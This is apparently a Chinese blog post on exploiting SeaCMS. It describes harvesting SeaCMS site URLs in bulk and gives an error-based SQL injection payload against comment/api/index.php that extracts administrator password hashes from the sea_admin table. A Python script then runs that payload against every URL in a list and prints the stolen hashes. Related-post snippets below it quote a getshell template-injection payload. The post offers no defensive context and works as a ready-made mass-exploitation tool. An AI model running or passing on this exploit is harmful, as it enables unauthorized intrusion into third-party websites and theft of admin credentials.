海洋seacms漏洞利用

最新推荐文章于 2024-05-20 08:43:25 发布
最新推荐文章于 2024-05-20 08:43:25 发布
阅读量3k 收藏 1
点赞数
文章标签: python 安全漏洞 安全 cms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/105567015
版权

0x001-url采集
通过对海洋cms源码研究,找出含有标志性的网站目录(search.php?searchtype=),然后利用url采集工具批量采集seacms网站

在这里插入图片描述
0x002-漏洞payload
payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27

0x003-exp制作

import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:
    url1 = url.strip()
    a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:
    result = "\n".join(aa)
    f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
pattern = re.compile("error: '(.*?)'")
for url in urls:
    try:
        target = url.strip() + exp
        html = requests.get(target).text
        if "seacms" in html:
            print(target)
            print("该url存在漏洞:"+url)
            print(re.search(pattern,html).group(1))
    except Exception as e:
        pass

0x004-exp的使用效果*
在这里插入图片描述

Henry404s
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
主机渗透——CRC_3_PENTEST_2_WORDPRESS
B_roin的博客
02-15 1248
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描 注意:带着token才能扫描出漏洞 WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932 在这里利用mailpress插件的命令执行漏洞,越权执行命令 2. 利用漏洞 http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php 利用hackbar或者burp su
海洋seacms中超酷ckplayer自动下一集代码。
03-17
海洋SEACMS中集成CKPlayer,可以为用户提供流畅、交互性强的视频观看体验。而"超酷ckplayer自动下一集代码"则是针对CKPlayer进行的一种定制化设置,目的是在用户观看完一个视频后,无需手动操作就能自动播放下一集...
海洋CMS 影视管理系统
09-26
海洋CMS 影视管理系统,海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP+MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 930
seacms漏洞复现详情
熊海CMS代码审计/熊海CMS代码审计_0基础黑客知识点
最新发布
程序员三九的博客
05-20 1001
我正在参加「掘金·启航计划」前言熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。作为一个早期的系统,里面代码存在许多漏洞利用
seacms海洋cms漏洞
YouthBelief的博客
10-29 5500
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
WEB漏洞之:海洋CMS代码执行(CNVD-2020-22721)
一位热爱网安的年轻人的博客
11-18 1520
web安全漏洞复现之:海洋cms远程代码执行
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 3046
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
海洋cms V6.57.zip_seacms_zip_海洋
09-21
用户在使用时,需要定期更新系统到最新版本,以防止已知的安全漏洞被利用。 - 配置合理的权限和访问控制,避免敏感数据泄露。 7. **SEO优化**: - 海洋CMS V6.57可能包含SEO优化功能,如元标签编辑、友好的URL...
海洋cms V6.53.zip_full_seacms_海洋CMS
09-15
"full seacms"标签意味着这个版本包含了海洋CMS的完整组件,包括核心系统、模块、插件以及必要的模板和数据,用户可以一站式完成安装,无需再额外下载其他组件。这样的打包方式使得部署和升级变得更加便捷。 "海洋...
seacms海洋影视管理系统 v6.53
11-29
seacms海洋影视管理系统 v6.53 更新日志 新增:微信公众平台模块优化:采集逻辑修复:部分文字描述错误 seacms海洋影视管理系统简介 海洋影视管理系统 (seacms,海洋cms)是一套专为不同
seacms 海洋视频内容管理系统 v6.58
11-26
海洋视频内容管理系统(seacms)是一款专门针对视频点播需求设计的管理软件,其核心功能在于帮助用户快速搭建和管理视频网站。该系统以其灵活性、便利性和人性化的设计著称,使得即便是没有太多技术背景的用户也能在...
day4-渗透测试_信息收集
m0_70099896的博客
11-24 33
通过让对方邮件服务器给我发送邮件,因为一般来说邮件服务器和web服务器都是在一台主机上,也就是同一个IP,服务器发邮件是以自己的真实IP发送的。查找目标有无子域名,查找子域名,子域名部署跟目标在同一台服务器,同一网段,可以进行爆破子域名的IP地址。国外不同地区IP ping 这个域名,如果ping的域名解析IP为同一个,很大概率为真实IP。配置文件泄露,如phpinfo(),前端的js代码,html代码都有可能会有IP地址的泄漏。查找目标域名的关联域名,如:.cn .com .org等等,来查找IP。
seacms最新版前台getshell
weixin_34025051的博客
06-10 166
cms版本:6.45,这是做一道ctf题目遇到的 实际上知道漏洞之后,题目并不难,记录的原因是。。。。payload一句话花了我一个小时。。 orz,不知道在干嘛,就是一直不成功! 漏洞原文 直接说题目,有了poc之后,我们试着写进去一句话 根据poc构造我们的paylaod }{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end...
信息安全 php获取flag,hack - PHP的信息安全(入侵获取$flag)的题目【Q1】
weixin_36487445的博客
03-20 474
地址:http://202.120.7.133:8888/collision.php正在参加ISG比赛,额,反正也是得奖无望了,不过作为一名PHPer,喵的我真心感觉这代码没问题啊。。。求大神解惑。如何获取$flag。。。回复内容:地址:http://202.120.7.133:8888/collision.php正在参加ISG比赛,额,反正也是得奖无望了,不过作为一名PHPer,喵的我真心感觉这...
seacms前台getshell
ranuy阮的博客
06-11 1061
0x01 简介 海洋影视管理系统(seacms,海洋cms海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。 0x02 环境搭建 使用phpstudy进行搭建。将整个upload上传到phpstudy目录下的www目录。将upload更改为seacms。 http://xxx.xxx.xxx.xxx/seacms/install/index.php进行安装。 安装成功后访问前台界面
2021-11-06
m0_57954651的博客
11-06 2347
BUGKU CTF (各种绕过) 打开题目 看到链接 首先 像这种给了我们完整代码 并且规规矩矩的 我们就要认真分析一下 所以 开启码农 模式 (虽然自己的php 学的蓝的无法接受 可还是不妨碍我们认真的态度 ????) 这里注意$_GET[‘id’] = urldecode($_GET[‘id’]) $_GET本身会进行一次url解码,这里相当于进行了两次url解码 然后 sha1(GET[′uname′]) === sha1(_POST[‘passwd’]...
Seacms漏洞
Grey的博客
07-10 5017
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1181
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
利用偏振SAR图像测量海洋表面波坡和波谱.docx
10-13
"本文详细探讨了如何利用偏振SAR图像测量海洋表面波的斜率和波谱,介绍了方向角和距离方向的测量方法,包括偏振角变化和α参数测量法,同时讨论了数据处理和分析过程,以及实验结果与传统方法的比较。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值